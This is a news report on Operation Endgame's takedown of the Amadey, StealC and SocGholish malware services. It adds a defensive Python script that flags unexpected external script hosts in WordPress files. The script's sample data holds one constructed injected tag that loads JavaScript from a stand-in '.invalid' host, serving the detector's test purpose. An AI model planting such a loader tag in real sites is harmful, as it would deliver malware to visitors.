
Global operation disrupts malware services tied to stolen credentials

Authorities and technology companies say Operation Endgame hit malware networks used to steal credentials, spread ransomware and commit fraud.


By Maya Lindqvist · Senior Technology Correspondent



International law enforcement agencies and private technology companies say they disrupted malware networks that helped criminals break into devices, steal logins and move money through scams. The coordinated action targeted services that authorities describe as part of a broader cybercrime supply chain.

Microsoft said Wednesday that the operation focused on Amadey and StealC, two separate crimeware platforms that are often used together by attackers. Europol said the broader Operation Endgame effort also disrupted SocGholish, a malware loader associated with the Russian cybercrime group Evil Corp.

Two services hit in one legal action

Amadey is a malware-as-a-service platform used to compromise computers and install other malicious tools, including ransomware payloads, according to Microsoft. The malware has been observed in active attacks since at least 2018.

StealC is sold as an information-stealing service, according to Microsoft and security firms involved in the operation. It is designed to collect passwords, authentication cookies, cryptocurrency wallets, browser-extension data and files that match patterns chosen by its customers.

Microsoft said its analysis found that Amadey and StealC, while operated separately, relied on some of the same infrastructure. The company said that finding came from AI-assisted analysis and allowed its lawyers to seek a court order that addressed both tools in one action.

Microsoft said it used racketeering statutes commonly associated with organized-crime cases to argue that the two services were part of a single conspiracy. The company said the action disrupted more than 200 command-and-control servers and cut off criminal control of more than 18,000 infected computers.

Servers, domains and stolen credentials seized

Europol said law enforcement and private-sector partners took action against 326 servers and 142 domains. The agency said investigators recovered as many as 27 million stolen login credentials and identified $47 million in crypto assets it described as criminal in origin.

Europol said the simultaneous disruption of the tools was intended to make cyberattacks harder to run, spread and rebuild after takedowns. Countries involved in the enforcement action included Canada, Denmark, Germany, the Netherlands, the United Kingdom and the United States, according to the agency.

Several private companies assisted in the work, including ESET, Proofpoint, IBM X-Force, Bitsight and Mitsui Bussan Secure Directions, according to public statements from the firms and Europol.

SocGholish sites cleaned

Europol said Operation Endgame also struck SocGholish, which spreads through compromised websites. Visitors to those sites are tricked into installing malicious software that poses as browser extensions or other legitimate applications, according to the agency.

Europol said authorities responded by cleaning infected WordPress sites and advising site administrators to change credentials and improve security. The agency also said it worked to notify people and organizations whose data or credentials were exposed through SocGholish activity.
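The cleanup Europol describes starts with finding the injected code. Loaders that spread through compromised websites typically work by adding a script tag to theme or plugin files that pulls JavaScript from a host the site owner never chose. The following is an added example for this article, not code from Europol, Microsoft or any firm named in the story: it parses a set of WordPress template files, collects every external script host they load and reports the ones missing from an allowlist. The file paths, file contents, hostnames and allowlist are constructed for illustration.

```python
"""Triage helper for a compromised-site cleanup: list the <script src=...>
hosts loaded by WordPress theme/plugin files that are not on the site
owner's allowlist. Added example; sample data below is constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this hypothetical site legitimately loads scripts from (assumption).
ALLOWED_SCRIPT_HOSTS = {"example-shop.test", "cdn.example-shop.test"}


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in a document.
    PHP blocks such as <?php wp_head(); ?> are skipped by the parser as
    processing instructions, so template files can be fed directly."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.srcs.append(value)


def external_script_hosts(html_text):
    """Return the set of hosts that <script src=...> tags load from.
    Relative paths and inline scripts have no host and are ignored."""
    parser = ScriptSrcCollector()
    parser.feed(html_text)
    hosts = set()
    for src in parser.srcs:
        # Protocol-relative URLs (//host/path) are common in injected tags;
        # give them a scheme so urlparse yields the hostname.
        if src.startswith("//"):
            src = "https:" + src
        host = urlparse(src).hostname
        if host:
            hosts.add(host.lower())
    return hosts


def find_unexpected_script_hosts(files, allowed_hosts):
    """Map each file path to the sorted list of script hosts it loads that
    are not on the allowlist. Files with no findings are omitted."""
    findings = {}
    for path, content in files.items():
        unexpected = external_script_hosts(content) - set(allowed_hosts)
        if unexpected:
            findings[path] = sorted(unexpected)
    return findings


# Constructed sample files standing in for a WordPress theme. The
# footer carries a made-up injected tag pointing at a reserved .invalid host.
SAMPLE_FILES = {
    "wp-content/themes/shop/header.php": (
        "<html><head>\n"
        "<?php wp_head(); ?>\n"
        "<script src=\"https://cdn.example-shop.test/app.js\"></script>\n"
        "</head><body>\n"
    ),
    "wp-content/themes/shop/footer.php": (
        "<script src=\"/wp-includes/js/jquery/jquery.min.js\"></script>\n"
        "<script src='//updates-check.invalid/load.js?id=1'></script>\n"
        "<script>console.log('inline');</script>\n"
        "</body></html>\n"
    ),
}

if __name__ == "__main__":
    report = find_unexpected_script_hosts(SAMPLE_FILES, ALLOWED_SCRIPT_HOSTS)
    for path, hosts in report.items():
        print(f"{path}: unexpected script host(s): {', '.join(hosts)}")
```

To run this against a real install, replace `SAMPLE_FILES` with the contents of every `.php`, `.html` and `.js` file under `wp-content`, and treat a hit as a lead rather than proof: the host then needs to be checked against what the site actually deploys. Removing the tag is only the first step; as the article notes, administrators should also rotate the credentials that let the attacker write to the files in the first place.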

Microsoft described the targeted services as a cybercrime “assembly line,” with Amadey helping attackers gain access to devices and StealC taking passwords and other sensitive data. Europol said the operation was designed to sever that connection and raise the cost for criminal groups that depend on shared malware infrastructure.

This story draws on original reporting from Ars Technica.